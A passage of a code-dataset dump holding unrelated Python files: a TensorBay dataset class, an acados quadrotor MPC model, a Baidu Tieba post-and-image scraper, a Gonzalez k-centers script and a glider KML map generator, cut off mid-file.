self.bin_point_cloud_fields:\n contents[\"binPointCloudFields\"] = self.bin_point_cloud_fields\n return contents\n\n\n# When the NameMixin is before Sequence[_T], typing will raise AttributeError.\n# related issue: python/typing#777\nclass DatasetBase(Sequence[_T], NameMixin): # pylint: disable=too-many-ancestors\n \"\"\"This class defines the concept of a basic dataset.\n\n DatasetBase represents a whole dataset contains several segments\n and is the base class of :class:`Dataset` and :class:`FusionDataset`.\n\n A dataset with labels should contain a :class:`~tensorbay.label.catalog.Catalog`\n indicating all the possible values of the labels.\n\n Arguments:\n name: The name of the dataset.\n gas: The :class:`~tensorbay.client.gas.GAS` client for getting a remote dataset.\n revision: The revision of the remote dataset.\n\n Attributes:\n catalog: The :class:`~tensorbay.label.catalog.Catalog` of the dataset.\n notes: The :class:`Notes` of the dataset.\n\n \"\"\"\n\n _is_fusion: bool\n\n _repr_type = ReprType.SEQUENCE\n\n def __init__(\n self, name: str, gas: Optional[\"GAS\"] = None, revision: Optional[str] = None\n ) -> None:\n super().__init__(name)\n\n if gas:\n self._client = gas.get_dataset(name, is_fusion=self._is_fusion)\n if revision:\n self._client.checkout(revision)\n else:\n self._segments: NameSortedList[_T] = NameSortedList()\n self._catalog = Catalog()\n self._notes = Notes()\n\n def __len__(self) -> int:\n return self._get_segments().__len__()\n\n @overload\n def __getitem__(self, index: Union[int, str]) -> _T:\n ...\n\n @overload\n def __getitem__(self, index: slice) -> Sequence[_T]:\n ...\n\n def __getitem__(self, index: Union[int, str, slice]) -> Union[Sequence[_T], _T]:\n if isinstance(index, str):\n return self._get_segments().get_from_name(index)\n\n return self._get_segments().__getitem__(index)\n\n def __delitem__(self, index: Union[int, str, slice]) -> None:\n if isinstance(index, slice):\n for key in self._get_segments()._data.keys()[index]:\n self._get_segments()._data.__delitem__(key)\n return\n\n if isinstance(index, int):\n index = self._get_segments()._data.keys()[index]\n\n self._get_segments()._data.__delitem__(index)\n\n @locked\n def _init_segments(self) -> None:\n self._segments = NameSortedList()\n # pylint: disable=protected-access\n for segment in self._client._list_segment_instances():\n self._segments.add(segment) # type: ignore[arg-type]\n\n def _get_segments(self) -> NameSortedList[_T]:\n if not hasattr(self, \"_segments\"):\n self._init_segments()\n\n return self._segments\n\n @property\n def catalog(self) -> Catalog:\n \"\"\"Return the catalog of the dataset.\n\n Returns:\n The :class:`~tensorbay.label.catalog.Catalog` of the dataset.\n\n \"\"\"\n if not hasattr(self, \"_catalog\"):\n self._catalog = self._client.get_catalog()\n\n return self._catalog\n\n @property\n def notes(self) -> Notes:\n \"\"\"Return the notes of the dataset.\n\n Returns:\n The class:`Notes` of the dataset.\n\n \"\"\"\n if not hasattr(self, \"_notes\"):\n self._notes = self._client.get_notes()\n\n return self._notes\n\n def keys(self) -> Tuple[str, ...]:\n \"\"\"Get all segment names.\n\n Returns:\n A tuple containing all segment names.\n\n \"\"\"\n # pylint: disable=protected-access\n return tuple(self._get_segments()._data)\n\n def load_catalog(self, filepath: str) -> None:\n \"\"\"Load catalog from a json file.\n\n Arguments:\n filepath: The path of the json file which contains the catalog information.\n\n \"\"\"\n with open(filepath, \"r\") as fp:\n contents = json.load(fp)\n self._catalog = Catalog.loads(contents)\n\n @Deprecated(since=\"v1.4.0\", removed_in=\"v1.7.0\", substitute=__getitem__)\n def get_segment_by_name(self, name: str) -> _T:\n \"\"\"Return the segment corresponding to the given name.\n\n Arguments:\n name: The name of the request segment.\n\n Returns:\n The segment which matches the input name.\n\n \"\"\"\n return self._get_segments().get_from_name(name)\n\n def add_segment(self, segment: _T) -> None:\n \"\"\"Add a segment to the dataset.\n\n Arguments:\n segment: The segment to be added.\n\n \"\"\"\n self._get_segments().add(segment)\n\n\nclass Dataset(DatasetBase[Segment]):\n \"\"\"This class defines the concept of dataset.\n\n Dataset is made up of data collected from only one sensor or data without sensor information.\n It consists of a list of :class:`~tensorbay.dataset.segment.Segment`.\n\n \"\"\"\n\n _is_fusion = False\n\n def create_segment(self, segment_name: str = \"\") -> Segment:\n \"\"\"Create a segment with the given name.\n\n Arguments:\n segment_name: The name of the segment to create, which default value is an empty string.\n\n Returns:\n The created :class:`~tensorbay.dataset.segment.Segment`.\n\n \"\"\"\n segment = Segment(segment_name)\n self._get_segments().add(segment)\n return segment\n\n\nclass FusionDataset(DatasetBase[FusionSegment]):\n \"\"\"This class defines the concept of fusion dataset.\n\n FusionDataset is made up of data collected from multiple sensors.\n It consists of a list of :class:`~tensorbay.dataset.segment.FusionSegment`.\n \"\"\"\n\n _is_fusion = True\n\n def create_segment(self, segment_name: str = \"\") -> FusionSegment:\n \"\"\"Create a fusion segment with the given name.\n\n Arguments:\n segment_name: The name of the fusion segment to create,\n which default value is an empty string.\n\n Returns:\n The created :class:`~tensorbay.dataset.segment.FusionSegment`.\n\n \"\"\"\n segment = FusionSegment(segment_name)\n self._get_segments().add(segment)\n return segment\n","sub_path":"tensorbay/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203820474","text":"#!/usr/bin/env python\n# coding=UTF-8\n'''\nAuthor: Wei Luo\nDate: 2021-06-01 11:46:48\nLastEditors: Wei Luo\nLastEditTime: 2021-06-02 22:37:34\nNote: Note\n'''\n\nimport casadi as ca\nimport numpy as np\nfrom acados_template import AcadosModel\n\n\ndef export_uav_model():\n g_ = 9.8066\n # control input\n roll_ref_ = ca.SX.sym('roll_ref')\n pitch_ref_ = ca.SX.sym('pitch_ref')\n thrust_ref_ = ca.SX.sym('thrust_ref')\n controls = ca.vcat([roll_ref_, pitch_ref_,\n thrust_ref_])\n\n # model state\n x_ = ca.SX.sym('x')\n y_ = ca.SX.sym('y')\n z_ = ca.SX.sym('z')\n vx_ = ca.SX.sym('vx')\n vy_ = ca.SX.sym('vy')\n vz_ = ca.SX.sym('vz')\n roll_ = ca.SX.sym('roll')\n pitch_ = ca.SX.sym('pitch')\n yaw_ = ca.SX.sym('yaw')\n\n # states [p, q, v]\n states = ca.vcat([x_, y_, z_, vx_, vy_, vz_, roll_, pitch_, yaw_])\n\n # roll_gain = 2.477\n # roll_tau = 0.477\n # pitch_gain = 2.477\n # pitch_tau = 0.477\n\n roll_gain = ca.SX.sym('roll_gain')\n roll_tau = ca.SX.sym('roll_tau')\n pitch_gain = ca.SX.sym('pitch_gain')\n pitch_tau = ca.SX.sym('pitch_tau')\n\n params = ca.vcat([roll_gain, roll_tau, pitch_gain, pitch_tau])\n\n rhs = [\n vx_,\n vy_,\n vz_,\n (ca.cos(roll_) * ca.cos(yaw_) * ca.sin(pitch_) +\n ca.sin(roll_) * ca.sin(yaw_)) * thrust_ref_,\n (ca.cos(roll_) * ca.sin(pitch_) * ca.sin(yaw_) -\n ca.cos(yaw_) * ca.sin(roll_)) * thrust_ref_,\n -g_ + ca.cos(pitch_) * ca.cos(roll_) * thrust_ref_,\n (roll_gain * roll_ref_ - roll_) / roll_tau,\n (pitch_gain * pitch_ref_ - pitch_) / pitch_tau,\n 0.0\n ]\n\n f = ca.Function('f', [states, controls], [ca.vcat(rhs)])\n\n x_dot = ca.SX.sym('x_dot', len(rhs))\n f_impl = x_dot - f(states, controls)\n\n model = AcadosModel()\n model.f_expl_expr = f(states, controls)\n model.f_impl_expr = f_impl\n model.x = states\n model.xdot = x_dot\n model.u = controls\n model.p = params\n model.name = 'quadrotor'\n\n constraints = ca.types.SimpleNamespace()\n constraints.roll_min = np.deg2rad(-85)\n constraints.pitch_min = np.deg2rad(-85)\n constraints.roll_max = np.deg2rad(85)\n constraints.pitch_max = np.deg2rad(85)\n constraints.thrust_min = 0.5*g_\n constraints.thrust_max = 1.9*g_\n\n return model, constraints\n","sub_path":"itm_quadrotor_node_old/itm_nonlinear_mpc/solver_generator_scripts_acados/nmpc_acados_uav.py","file_name":"nmpc_acados_uav.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145609253","text":"# 需求:爬取任意百度贴吧的列表页标题和链接地址; 以及每一个帖子(详情页)内的图片\n# 思路: 使用chrome浏览器中低版本的手机端,找到百度贴吧极速版的入口,使用 xpath 来提取数据\n\"\"\"\nhttps://tieba.baidu.com/mo/q---7EAD792A1FE0B613B16325D0E5802760%3AFG%3D1--1-3-0--2--wapp_1539301430297_582/m?kw=%E6%9D%8E%E6%AF%85&lp=5011&lm=&pn=20\n\n\n\n\"\"\"\nimport json\nimport sys\nimport time\nimport random\n\nfrom lxml import etree\nimport requests\n\n\nclass TiebaSpider:\n def __init__(self, tieba_name):\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13'\n }\n self.start_url = 'https://tieba.baidu.com/mo/q---7EAD792A1FE0B613B16325D0E5802760%3AFG%3D1--1-3-0--2--wapp_1539301430297_582/m?kw={}&lp=5011&lm=&pn=0'.format(tieba_name)\n self.part_url = 'https://tieba.baidu.com/mo/q---7EAD792A1FE0B613B16325D0E5802760%3AFG%3D1--1-3-0--2--wapp_1539301430297_582/'\n\n def get_response(self, url):\n print(requests.utils.unquote(url))\n resp = requests.get(url, self.headers)\n # print(resp.content) # 比对请求结果和 element 中结果的区别\n return resp.content\n\n def parse_data(self, html_bytes):\n # print(html_bytes.decode('utf-8', 'ignore'))\n html = etree.HTML(html_bytes)\n # 增加处理逻辑: 控制停止爬取的节点\n a_list = html.xpath('//body/div/div[contains(@class, \"i\")]/a')\n data_list = []\n for a in a_list:\n item = {}\n # url 要拼接\n item['href'] = self.part_url + a.xpath('./@href')[0] if len(a.xpath('./@href')) > 0 else None\n item['title'] = a.xpath('./text()')[0] if len(a.xpath('./@href')) > 0 else None\n item[\"img_list\"] = self.get_img_list(item[\"href\"], [])\n # print(item)\n data_list.append(item)\n # 获取下一页的url地址\n next_url = self.part_url + html.xpath('//a[contains(text(), \"下一页\")]/@href')[0] if len(\n html.xpath('//a[contains(text(), \"下一页\")]/@href')) > 0 else None\n return data_list, next_url\n\n def get_img_list(self, detail_url, img_list):\n # 1.发送请求,获取响应\n detail_html_str = self.get_response(detail_url)\n # 2.提取数据\n detail_html = etree.HTML(detail_html_str)\n img_list += detail_html.xpath(\"//img[@class='BDE_Image']/@src\")\n\n # 详情页下一页的url地址\n next_url = detail_html.xpath(\"//a[text()='下一页']/@href\")\n next_url = self.part_url + next_url[0] if len(next_url) > 0 else None\n if next_url is not None: # 当存在详情页的下一页,请求\n return self.get_img_list(next_url, img_list)\n\n # else不用写\n img_list = [requests.utils.unquote(i).split(\"src=\")[-1] for i in img_list]\n return img_list\n\n def save_content(self, data):\n with open('tieba.txt', 'a', encoding='utf-8') as f:\n f.write(json.dumps(data, ensure_ascii=False, indent=2))\n print(data)\n print('保存成功')\n\n def run(self):\n # 获取url, 这里的url的最后一页数量不确定,所以不能 构造 url 列表\n next_url = self.start_url\n\n while next_url is not None:\n # 发送请求,获取响应\n html = self.get_response(next_url)\n\n # 数据处理\n data_list, next_url = self.parse_data(html)\n\n # 保存\n self.save_content(data_list)\n\n time.sleep(random.randint(1, 4) * 0.5)\n\n\nif __name__ == '__main__':\n # print('请在终端按照格式[python3 tieba_spider.py 贴吧名],例如[python3 tieba_spider.py \"李毅\"]运行该程序')\n # tieba_name = sys.argv[1]\n tieba_name = '武汉'\n spider = TiebaSpider(tieba_name)\n spider.run()\n","sub_path":"08_tieba_upgrade/tieba_spider.py","file_name":"tieba_spider.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179505177","text":"'''\n File name: Gonzalez_centers.py\n Description: Classic Kcenters algorithm which picks the furthest point\n as the center\n Author: Sharvaree V\n Last modified: 16th May 2019\n Python Version: 3.5\n'''\n\nimport numpy as np\nfrom scipy.spatial import distance\nimport math\nimport csv\n\ndef max_dist(data, centers):\n distances = np.zeros(len(data)) #cumulative distance measure for all points\n for cluster_id, center in enumerate(centers):\n for point_id, point in enumerate(data):\n if distance.euclidean(point,center) == 0.0:\n distances[point_id] = -math.inf # already in cluster\n if not math.isinf(distances[point_id]):\n # add the distance\n distances[point_id] = distances[point_id] + distance.euclidean(point,center)\n # return the point which is furthest away\n return data[np.argmax(distances)]\n\ndef Gonzalez(data, num_clusters, init):\n '''\n data Data as numpy array\n num_clusters Number of clusters (k)\n init First center to initialize the algorithm\n '''\n\n\n centers = []\n centers.append(init) # initialize the first center\n while len(centers) is not num_clusters:\n centers.append(max_dist(data, centers))\n return np.array(centers)\n\n\n#dummy data_set\nfrom sklearn import cluster, datasets, mixture\nn_samples=100\nnoisy_circles = datasets.make_circles(n_samples=n_samples, factor=.5,\n noise=.05)\ndata= noisy_circles[0]\nGonzalez_centers = Gonzalez(data, num_clusters=3, init=data[0])\n#print('Cluster Centers:', Gonzalez_centers)\n","sub_path":"lib/Gonzalez_centers.py","file_name":"Gonzalez_centers.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"293203012","text":"#!/usr/bin/env python3\n\"\"\"\nThis module creates glider kmls for ooi arrays\n\"\"\"\n\n# IMPORTS\nimport os, configparser, time, sys\nfrom fnmatch import fnmatch\n\n# LOCAL IMPORTS\nimport kml_snips as kml\nimport gliderStateXML_parser as gsx\nimport argos_parser\n\n# INVARIABLES\nTRUE_STRINGS = ['TRUE','YES','ON','1']\nFALSE_STRINGS = ['FALSE','NO','OFF','0']\n\n\ndef read_config(config_file):\n\n config = configparser.ConfigParser(inline_comment_prefixes=('#',))\n config.optionxform = str # make keys case sensitive\n config.read(config_file)\n\n ## load-in default icons from file ##\n try:\n config.read([config['DEFAULT']['icon_ini'],config_file])\n except KeyError:\n config.read(['config/default_icons.ini',config_file])\n\n ## GROUP CONFIG FILE INTO GLIDERS, MOORINGS, AND SETTINGS ##\n output = {}\n for section in config.sections():\n if section == 'DEFAULT': continue\n\n ## ESTABLISHING DEFAULT FILENAME ##\n if 'file_name' not in config[section].keys() or config[section]['file_name']=='':\n # defaults to .kml\n fname = os.path.basename(config_file)\n doti = fname.rindex('.')\n fname = fname[:doti] + '.kml'\n config[section]['file_name'] = fname\n\n array = dict(name=section,gliders={},moorings={},lines={},settings={})\n for key,val in config[section].items():\n if fnmatch(val,'??05MOAS-?????/D?????') or fnmatch(val,'gliders1/*'):\n array['gliders'][key] = dict(name=key, refdes=val)\n elif len(val.split(' ')) == 2: #startswith(('FLMA','FLMB','HYPM','SUMO')) or fnmatch(key,'PM??'):\n lat,lon = val.split()\n array['moorings'][key] = dict(name=key, lat=lat,lon=lon)\n elif len(val.split(',')) >= 2: # paths\n pairs = val.split(',')\n coords_list = []\n for p in pairs:\n lon,lat = p.strip().split(' ')\n coord = dict(name=key, lat=float(lat),lon=float(lon))\n coords_list.append( coord )\n array['lines'][key] = coords_list\n else:\n if val.upper() in FALSE_STRINGS: val = False\n elif val.upper() in TRUE_STRINGS: val = True\n array['settings'][key] = val\n\n ## DEFAULTS VALUES OF UN-SPECIFIED SETTINGS ##\n #TODO inheritable defaults .ini file\n settings = array['settings']\n options = array['settings'].keys()\n if 'datapath' not in options:\n settings['datapath'] = '.'\n if 'tail_length' not in options:\n settings['tail_length'] = 'inf'\n if 'time_scrolling' not in options:\n settings['time_scrolling'] = False\n if 'show_by_default' not in options:\n settings['show_by_default'] = True\n if 'rich_bubbletext' not in options:\n settings['rich_bubbletext'] = True\n if 'argos_start' not in options:\n settings['argos_start'] = 'inf' #furthest back\n if 'argos_end' not in options:\n settings['argos_start'] = 0 #most recent\n if 'argos_src' not in options:\n settings['argos_src'] = None\n if 'greyout_timeout' not in options:\n settings['greyout_timeout'] = 'inf'\n\n ## ORDER ARRAYS BY OUTPUT FILENAME ##\n try:\n output[ array['settings']['file_name'] ].append(array)\n except KeyError:\n output[ array['settings']['file_name'] ] = [array]\n\n return output\n\ndef make_lines_pmarks(lines, settings):\n pmarks,styles = [],[] \n \n for name,line in lines.items():\n path = kml.LineString(line)\n styleUrl= 'PATH_STYLE_'+name\n try: color = possible_custom_setting(name, 'color', settings)\n except: color = 'white'\n color = kml.HEXCOLOR[color.lower()]\n style=kml.Style(id=styleUrl, LineStyle=kml.LineStyle(color))\n pmark = kml.Placemark(name=name,\n geometry=path,\n styleUrl=styleUrl )\n pmarks.append(pmark)\n styles.append(style)\n return pmarks, styles\n\ndef make_mooring_pmarks(moorings, settings):\n\n pmarks,styles = [],[]\n for mooring in sorted(moorings.values(), key=lambda m: m['name']):\n point = kml.Point(lat=mooring['lat'],\n lon=mooring['lon'])\n\n # assemble mooring icon\n iconURL = possible_custom_setting(mooring['name'], 'mooring_icon', settings)\n styleUrl = 'MOORING_STYLE_'+iconURL[iconURL.rindex('/')+1:]\n style = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL,scale=1.2,\n hotSpot = kml.IconStyle.hotSpot(y=0.05)), #put icon anchor near bottom center\n BalloonStyle=kml.BalloonStyle(None),\n id=styleUrl)\n lookat = kml.LookAt(range=230000,lat=mooring['lat'],lon=mooring['lon'])\n p = kml.Placemark(name=mooring['name'],\n geometry=point,\n LookAt = lookat,\n styleUrl=styleUrl)\n\n pmarks.append(p)\n styles.append(style)\n styles = list(set(styles))\n return pmarks,styles\n\ndef possible_custom_setting(name,setting,settings):\n try:\n # if custom setting exists use that, else use default\n possible_setting = '{} {}'.format(name,setting)\n settings[possible_setting] # test if key exists\n setting = possible_setting\n except: pass\n setting_val = settings[setting]\n\n # if setting is an icon but not a URL, pre-pend path to web hosted icon_folder\n if '_icon' in setting and not setting_val.startswith('http'):\n return os.path.join(settings['icon_folder'], setting_val)\n\n try: return float(setting_val)\n except: return setting_val\n\n\n\ndef make_glider_features(gliders,settings):\n glider_pmarks, glider_surfacings, glider_trails, glider_wpts, glider_argos, styles = [],[],[],[],[],[]\n for glider in sorted(gliders.values(), key=lambda g: g['name']):\n print(' '+glider['name'])\n gstate_path = os.path.join(settings['datapath'],glider['refdes'],'gliderState.xml')\n\n try:\n try: coords, script, wpt, lastabort = gsx.parse(gstate_path)\n except ValueError:\n coords, script, wpt, lastabort = gsx.alt_parse(gstate_path)\n except FileNotFoundError:\n coords, script, wpt, lastabort = gsx.alt_parse(gstate_path)\n except Exception as e:\n print('make_glider_feature() error',type(e),e)\n continue\n except FileNotFoundError as e1:\n print('FNFE:',e1)\n continue\n except IndexError as e1:\n print('FNFE:',e1)\n continue\n\n ### hack to remove one known bad datapoint from one glider ###\n if glider['name'] == 'ga_578':\n for coord in coords:\n if int(coord['lon']) == -144 and int(coord['lat']) == 50:\n coords.remove(coord)\n break\n\n ### GLIDER PMARK ###\n t = coords[-1]['epoch']\n if wpt is None: bearing = None\n else: bearing = wpt['bearing']\n\n style,styleUrl = get_glider_icon_style(settings, bearing, glider['name'],t)\n desc = glider_desc(glider,coords[-1],script,lastabort)\n lookat = kml.LookAt(lat=coords[-1]['lat'],lon=coords[-1]['lon'],range=230000)\n pmark = kml.Placemark(name=glider['name'], # last coord is most recent\n geometry=kml.Point(lat=coords[-1]['lat'],\n lon=coords[-1]['lon']),\n styleUrl=styleUrl,\n description=desc,\n LookAt=lookat,\n Snippet=kml.Snippet(None))\n glider_pmarks.append(pmark)\n styles.append(style)\n\n\n ### GLIDER SURFACINGS ###\n surfmarks = []\n iconURL = possible_custom_setting(glider['name'], 'glider_icon_surf', settings)\n surfacing_style_mousover = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL, scale=0.8),\n BalloonStyle=kml.BalloonStyle(None))\n surfacing_style_normal = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL, scale=0.2),\n LabelStyle=kml.LabelStyle(scale=0))\n styleUrl = 'Surfacing_'+iconURL\n surfacing_style = kml.StyleMap(styleUrl, surfacing_style_normal, surfacing_style_mousover)\n styles.append(surfacing_style)\n limit = det_tail_length(settings, 'tail_length', glider['name'], coords)\n for coord in coords[-limit:-1]:\n surface_dialogue_count = coord['dupes']\n name = '{} {}'.format(glider['name'], coord['timestamp'])\n if possible_custom_setting(glider['name'],'time_scrolling',settings):\n ts = kml.TimeStamp(coord['epoch'])\n else: ts = None\n surfmark = kml.Placemark(name=name, styleUrl=surfacing_style.id,\n geometry=kml.Point(lat=coord['lat'],\n lon=coord['lon']),\n time = ts)\n surfmarks.append(surfmark)\n glider_surfacings.append(surfmarks)\n\n\n ### GLIDER TRAIL ###\n styleUrl = 'gtrail'\n limit = det_tail_length(settings, 'tail_length', glider['name'], coords)\n style = kml.Style(id=styleUrl, LabelStyle=kml.LabelStyle(scale=0),\n LineStyle=kml.LineStyle(kml.HEXCOLOR['yellow']))\n styles.append(style)\n time_scrolling = possible_custom_setting(glider['name'],'time_scrolling',settings)\n trailmark = kml.Placemark(name = glider['name']+' Trail',\n styleUrl=styleUrl,\n geometry=kml.LineString(coords[-limit:]))\n glider_trails.append(trailmark)\n\n # # TIME TRAILS are not really working, probably due to glidertrails not being properly injested later\n # for i in range(len(coords[-limit:])-1):\n # geom = kml.LineString(coords[i:i+3]) # returns two consecutive coords\n # tspan = kml.TimeSpan(coords[i]['epoch'],coords[i+1]['epoch'])\n # trailmark = kml.Placemark(name=glider['name'] + ' Trail' + str(i),\n # styleUrl=styleUrl,\n # geometry=geom,\n # time=tspan)\n # glider_trails.append(trailmark)\n\n\n ### GLIDER WPT ###\n if wpt is None:\n glider_wpts.append(None)\n else:\n name=\"{}'s Next Waypoint\".format(glider['name'])\n desc = kml.xml('pre','Lat:{:+.3f}\\nLon:{:+.3f}'.format(wpt['lat'],wpt['lon']))\n iconURL = possible_custom_setting(glider['name'], 'nextwpt_icon', settings)\n styleUrl = 'NextWpt_'+iconURL\n nextwpt_style_mouseover = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL),\n BalloonStyle=kml.BalloonStyle(None))\n nextwpt_style_normal = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL),\n LabelStyle=kml.LabelStyle(scale=0))\n nextwpt_style = kml.StyleMap(styleUrl, nextwpt_style_normal, nextwpt_style_mouseover)\n styles.append(nextwpt_style)\n wptmark = kml.Placemark(styleUrl=nextwpt_style.id, name=name, description=desc,\n geometry=kml.Point(lat=wpt['lat'],lon=wpt['lon']),\n Snippet=kml.Snippet(None))\n glider_wpts.append(wptmark)\n\n\n ### GLIDER ARGOS ###\n if settings['argos_src']:\n argos_hits = argos_parser.main(settings['argos_src'],glider['name'])\n argos_pmarks = []\n iconURL = possible_custom_setting(glider['name'], 'argos_icon', settings)\n argos_style = kml.Style(id='Argos_'+iconURL,\n IconStyle=kml.IconStyle(iconhref=iconURL, scale=1),\n LabelStyle=kml.LabelStyle(scale=0),\n BalloonStyle=kml.BalloonStyle(None))\n styles.append(argos_style)\n start_limit = det_tail_length(settings, 'argos_start', glider['name'], argos_hits)\n end_limit = det_tail_length(settings, 'argos_end', glider['name'], argos_hits)\n for argos_hit in argos_hits[-start_limit:-end_limit]:\n argos_pmark = kml.Placemark(name=glider['name']+' Argos_Hit '+argos_hit['timestamp'],\n styleUrl=argos_style.id, visibility = 0,\n description = argos_hit['desc'],\n Snippet = kml.Snippet(None),\n geometry=kml.Point(lat=argos_hit['lat'],\n lon=argos_hit['lon']))\n argos_pmarks.append(argos_pmark)\n glider_argos.append(argos_pmarks)\n\n styles = list(set(styles))\n return glider_pmarks, glider_surfacings, glider_trails, glider_wpts, glider_argos, styles\n\ndef glider_desc(glider, coord, script, lastabort):\n\n refdes = '{}\\n\\n'.format(glider['refdes'])\n gps_str = 'GPS HIT: {:+.3f}N {:+.3f}E\\nHIT TIME: {}\\n\\n'.format(coord['lat'],coord['lon'],coord['timestamp'])\n\n try:\n if script['status'] == '0': status = 'paused'\n elif script['status'] == '1': status = 'on'\n else:status = 'unknown. status_code='+script['status']\n script_str = 'SCRIPT: {}\\nSTATUS: {}\\n\\n'.format(script['name'],status)\n except TypeError:\n script_str = '' # for if script is None\n\n try:\n abort_str = 'LAST ABORT\\nTIMESTAMP: {ts}\\nMISSION: {mis}\\nSEGMENT: {seg}\\nREASON: {why}\\nTOTAL: {tot}\\n\\n'\n abort_str = abort_str.format(tot=lastabort['reset_num'],\n ts=lastabort['timestamp'],\n mis=lastabort['mission'],\n seg=lastabort['segment'],\n why=lastabort['type'])\n except TypeError:\n abort_str = '' # for if lastabort is None\n\n ts = time.strftime('%Y-%m-%d %H:%M:00 EST',time.localtime(time.time()))\n footer = '(DATA CURRENT AS OF {})'.format(ts)\n desc = refdes + gps_str + script_str + abort_str + footer\n desc = '
{}
'.format(desc)\n return kml.CDATA_wrap(desc)\n\ndef det_tail_length(settings, setting, glidername=None, coords=None ):\n\n limit = possible_custom_setting(glidername, setting,settings)\n\n #num of unique surfacing locations\n if isinstance(limit,(int,float)):\n try: return int(limit)+1\n except OverflowError: return 0 # in-case limit == 'inf'\n\n # DAYS AGO\n if 'day' in limit.lower():\n limit = ''.join(char for char in limit if char.isdigit() or char=='.') # strip limit of non-numbers\n limit = time.time()-int(limit)*24*60*60 # epoch limit\n limit = time.strftime('%Y-%m-%d',time.gmtime(limit))\n\n #DATE\n try:\n for i,coord in enumerate(reversed(coords)):\n if coord['timestamp'] < limit:\n return i\n except Exception as e: print(type(e),e,type(coords))\n\n return 0 # infinite\n\ndef get_glider_icon_style(settings, heading=None, glidername=None, glider_epoch=float('-inf')):\n\n try:\n heading = int(heading)\n if 0 <= heading%360 < 180:\n icon = 'glider_icon_R'\n offset = heading -90-30 # TODO adjust to be more exact (based on latitude??)\n else: # 180 <= heading%360 < 360:\n icon = 'glider_icon_L'\n offset = heading +90-5 # TODO adjust to be more exact (based on latitude??)\n if glider_epoch < time.time()-60*60*possible_custom_setting(glidername,'greyout_timeout',settings):\n icon = 'glider_icon_grey'\n offset = 0\n iconURL = possible_custom_setting(glidername, icon, settings)\n except TypeError as e:\n #print(type(e),e)\n print('no-heading')\n iconURL = possible_custom_setting(glidername,'glider_icon_tail',settings)\n heading,offset = 0,0\n\n styleUrl = iconURL[iconURL.rindex('/')+1:]+str(heading)\n style = kml.Style(id=styleUrl,\n BalloonStyle=kml.BalloonStyle(None),\n IconStyle=kml.IconStyle(heading=offset,\n iconhref=iconURL,\n scale=1.5))\n return style, styleUrl\n\n#TODO fetchin argos data\n\n#TODO Low Bandwidth ini, past deployment ini\n\n#TODO touring object (is by id possible?)\n\n#TODO find surfacing of last abort and make it stand out somehow,\n# click on link in ballon abort text -> fly to view perhaps?\n\n#TODO KMZ\n#TODO show_by_default\n#TODO rich_bubbletext\n# brush up on that http!\n#TODO UNIT_TESTS\n#TODO propper logging\n\n\n######## MAIN SCRIPT #########\n\ndef main(configs, output_kml_file):\n\n array_folders = []\n styles = []\n for array in sorted(configs, key=lambda arr: arr['name']):\n print(' '+array['name'].upper().strip())\n\n # CREATE KML PLACEMARKS AND STYLES #\n lines_pmarks, \\\n lines_styles = make_lines_pmarks(array['lines'], array['settings'])\n \n mooring_pmarks,\\\n mooring_styles = make_mooring_pmarks(array['moorings'], array['settings'])\n \n glider_pmarks,\\\n glider_surfacings,\\\n glider_trails,\\\n glider_wpts,\\\n glider_argos,\\\n glider_styles = make_glider_features(array['gliders'],array['settings'])\n\n # CREATE FOLDER STRUCTURE #\n if array['settings']['show_by_default']:\n array_folder = kml.Folder(name=array['name'], open=1)\n else:\n array_folder = kml.Folder(name=array['name'], visibility=0)\n more_folder = kml.Folder(name='more...',\n style=kml.Style(ListStyle=kml.checkOffOnly_ListStyle))\n surfacings_folders = []\n argos_folders = []\n for glider in glider_pmarks:\n if glider_surfacings:\n surfacings_folder = kml.Folder(name=glider.name + \" Surfacings\")\n surfacings_folders.append(surfacings_folder)\n if glider_argos:\n argos_folder = kml.Folder(name=glider.name +\" Argos\", visibility=0)\n argos_folders.append(argos_folder)\n \n # hotpatch quickfix #\n # no next-wpt or surfacings for archive #\n if array['settings']['file_name'] == 'archive.kml':\n glider_wpts, glider_surfacings, surfacings_folders = [], [], []\n more_folder = kml.Folder(name='more...')\n\n # FILLING FOLDERS WITH PLACEMARKS # ##ARCHIVE ARRAY MODE\n array_folder.extend(glider_pmarks)\n array_folder.extend(mooring_pmarks)\n array_folder.append(more_folder)\n more_folder.extend(glider_wpts)\n more_folder.extend(glider_trails)\n more_folder.extend(surfacings_folders)\n more_folder.extend(lines_pmarks)\n ##more_folder.extend(glider_pmarks)\n ##more_folder.extend(surfacings_folders)\n for i, glider in enumerate(glider_pmarks):\n if surfacings_folders: surfacings_folders[i].extend(glider_surfacings[i])\n if glider_argos: argos_folders[i].extend(glider_argos[i])\n ##array_folder.extend(glider_trails)\n ##array_folder.append(more_folder)\n\n array_folders.append(array_folder)\n styles.extend(mooring_styles + glider_styles + lines_styles)\n\n #print('TOTAL_STYLES list:', len(styles), ' set:', len(set(styles)))\n # remove duplicates and sort kml's shared styles\n styles = sorted(list(set(styles)))\n\n # Assembly of all Features and Containers into the full document\n doc = kml.kml(kml.Document(*styles + array_folders, open=1))\n\n # outputting the doc!\n if output_kml_file:\n doc.save(output_kml_file)\n print(output_kml_file, '...done!')\n else:\n doc.pprint()\n\n ## CREATE NETWORK LINK FILE IF NETLINK SETTING SET\n try:\n # We don't want the network link to load a monstrous amount of data all at once\n if any([array['settings']['show_by_default'] is False for array in configs]):\n chekov_style = kml.Style(ListStyle=kml.checkOffOnly_ListStyle)\n else: chekov_style = None\n\n targetURL = config[0]['settings']['netlink']\n netdoc = kml.kml(kml.NetworkLink(kml.Link(targetURL, refreshInterval=60),\n chekov_style))\n doti = output_kml_file.rindex('.')\n output_netlink_file = 